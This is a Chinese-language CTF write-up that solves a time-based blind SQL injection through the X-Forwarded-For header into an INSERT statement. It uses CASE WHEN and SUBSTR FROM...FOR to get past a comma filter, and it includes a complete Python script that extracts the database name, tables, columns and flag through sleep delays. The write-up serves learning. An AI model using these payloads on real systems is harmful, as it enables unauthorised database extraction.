记一道INSERT INTO盲注的CTF题目

题目链接：链接

题目给出了源码(如下），可以看到网站储存了用户访问时的ip信息。

除了逗号以外未过滤其他输入，直接拼接到insert into语句中，存在注入点，由于没有输出点，考虑使用盲注。

由于过滤了逗号无法使用if(a,b,c)格式测试，改为使用case when else格式代替。

测试数据库长度，网站延迟回显，证明payload构造成功。

接着猜解名字需要用到substr，被过滤的逗号可以用 from for代替，如

substr((select flag from flag) from 1 for 1

附：题目完整解题过程逐步演示代码

import requests
import time
url="http://123.206.87.240:8002/web15/"
i=0
schelen=0
print("开始猜解数据库长度")
while True:
    payload="127.0.0.1' and case when(length(database())>"+str(i)+") then sleep(5) else 1 end)#"
    # print(payload)
    start=time.time()
    headers={'X-Forwarded-For':payload}
    demo=requests.get(url,headers=headers)
    final=time.time()

    if final-start>4:
        schelen+=1
        print(schelen)
    else:
        print("数据库名长度"+str(schelen))
        break
    i+=1
print("开始猜解database")
flag=""
for j in range(1,schelen+1):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr(database() from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解表名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag表列名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x666c6167) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag")
flag=""
for j in range(1,35):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select flag from flag) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)